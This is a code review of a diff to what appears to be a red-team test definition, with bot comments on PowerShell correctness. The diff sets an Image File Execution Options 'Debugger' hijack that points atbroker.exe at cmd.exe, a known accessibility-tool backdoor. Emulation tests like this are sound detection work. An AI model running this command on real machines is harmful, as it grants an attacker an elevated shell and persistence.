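Review bot: Neither `New-Item` nor `New-ItemProperty` is piped to `Out-Null` here, so the created key and property objects are dumped into the executor output, unlike the atbroker variant below which silences `New-Item`; make the seven variants consistent by appending `| Out-Null` to every call. The IF arm's `-PropertyType DWORD` must be `String` — a DWORD cannot store the cmd.exe path and the write fails on a host without an existing DisplaySwitch.exe key — and the ELSE arm needs `-Force` so re-runs overwrite instead of error.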
@@ -12868,11 +13033,24 @@ privilege-escalation:
type: String
default: atbroker.exe
executor:
- name: command_prompt
+ name: powershell
elevation_required: true
- command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
- File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
- "C:\windows\system32\cmd.exe" /f
+ command: |
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
+ $Value = "C:\windows\system32\cmd.exe"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force | Out-Null
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
+ NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
+ /f
'
'':
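Review bot: `| Out-Null` on `New-Item` is applied only in this atbroker variant and only to `New-Item`, leaving both `New-ItemProperty` calls noisy and the other thirteen copies of this block in the file without it; apply one convention everywhere. The `-PropertyType DWORD` on the IF-arm New-ItemProperty should be `String`, because a DWORD cannot hold the `C:\windows\system32\cmd.exe` path and the value is never written on a host without an existing atbroker.exe key, and the ELSE arm should take `-Force` so an existing Debugger value is overwritten on re-run. `cleanup_command` uses `HKEY_LOCAL_MACHINE` while `command` uses `HKLM:`; both work, but `reg delete "HKLM\..."` keeps the two consistent.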